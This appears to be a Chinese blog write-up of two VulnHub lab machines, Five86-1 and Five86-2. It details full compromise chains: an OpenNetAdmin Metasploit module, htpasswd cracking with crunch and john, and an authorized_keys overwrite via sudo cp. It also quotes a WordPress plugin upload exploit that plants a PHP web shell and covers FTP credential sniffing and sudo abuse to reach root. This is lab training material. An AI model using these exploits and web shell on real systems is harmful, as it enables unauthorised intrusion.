VulnHub Five86 1 & 2

记录Five86 – 1 和 Five86 -2 的过程。

Five86 – 1

本地IP:192.168.31.249
靶机IP:192.168.31.212

80端口扫描目录发现/robots.txt,Disallow: /ona

访问/ona,系统是OpenNetAdmin,searchsploit到msf的module,获取www-data权限

# 找到www-data可以操作的文件
> find / -type f -user www-data 2> /dev/null

> cat /var/www/html/reports/.htaccess
...
AuthUserFile /var/www/.htpasswd

得到一串密文,下面第二条注释提示密码由aefhrt,6个字符生成的10位字符串。

# 生成aefhrt组成的10位字典
> crunch 10 10 aefhrt -o w.txt

# 写入密文到hash.txt
> echo 'douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1' > hash.txt

# 使用john工具猜解密文。(指定字典的参数有点反人类,一定要用=号,不能空格指定)
> john --wordlist=w.txt hash.txt
得到密码:fatherrrrr

使用SSH登录douglas,密码fatherrrrr。

# jen用户的cp命令可以免密码sudo
> sudo -l
...
(jen) NOPASSWD: /bin/cp

# 生成密钥,覆盖jen用户的.ssh/authorized_keys文件,从而实现免密登录
> ssh-keygen
...
Your public key has been saved in /home/douglas/.ssh/id_rsa.pub

> cp /home/douglas/.ssh/id_rsa.pub /tmp/authorized_keys

# 移动到/tmp目录并给777权限,这样jen用户就可以copy到自己的.ssh目录了
> chmod 777 /tmp/authorized_keys

# 开始覆盖
> sudo -u jen cp /tmp/authorized_keys /home/jen/.ssh/

登录jen后,有一封邮件(/var/mail/jen),内容写着Moss用户的密码

密码:Fire!Fire!

登录moss用户后,执行~/.game/upyourgame,得到root权限。


Five86 – 2

本地IP:192.168.31.249
靶机IP:192.168.31.90

> cat /etc/hosts
192.168.31.90    five86-2

# 端口
21/tcp open   ftp      ProFTPD 1.3.5e
80/tcp open   http     Apache httpd 2.4.41 ((Ubuntu))

80端口应用WordPress,使用wpscan -e u 枚举出用户:admin,gillian,barney,peter,setphen

wpscan -U -P 枚举用户密码: barney / spooky1 & stephen / apollo1

登录WordPress,其中插件:Insert or Embed Articulate Content into WordPress 在wpvulndb.com中搜索出exploit

# Version: 4.2995 <= 4.2997 
# Tested on: WordPress 5.1.1, PHP 5.6 
# CVE : -


## 1. Create a .zip archive with 2 files: index.html, index.php

echo "<html>hello</html>" > index.html
echo "<?php echo system($_GET['cmd']); ?>" > index.php
zip poc.zip index.html index.php 

## 2. Log in to wp-admin with any user role that has access to the plugin functionality (by default even `Contributors` role have access to it)
## 3. Create a new Post -> Select `Add block` -> E-Learning -> Upload the poc.zip -> Insert as: Iframe -> Insert (just like in tutorial https://youtu.be/knst26fEGCw?t=44 ;)
## 4. Access the webshell from the URL displayed after upload similar to 

http://website.com/wp-admin/uploads/articulate_uploads/poc/index.php?cmd=whoami

获取www-data权限后,su stephen,登录stephen账户。

paul      1750  0.0  0.0   2600   720 ?        S    15:40   0:00 /bin/sh /home/paul/ftp_upload.sh
paul      1751  0.0  0.2   3224  2180 ?        S    15:40   0:00 ftp -n 172.18.0.10

ps发现后台有ftp连接,tcpdump -c 20 -w f后,文件f中记录了ftp的账户密码

> su paul
...
(peter) NOPASSWD: /usr/sbin/service

# service可以利用service ../../bin/sh 来获取命令行
> sudo -u peter service ../../bin/sh

# 获取到peter账户权限
> whoami
peter

> sudo -l
...
(root) NOPASSWD: /usr/sbin/passwd

# 修改root账户密码
> sudo passwd root

> su root
> whoami
root

总结:Kali不熟悉,john,crunch这些工具都不知道;爆破WP的时候,字典准备不全,仅用了top1k和top6k,以后做渗透应准备低中高三个数量级的字典。

留下评论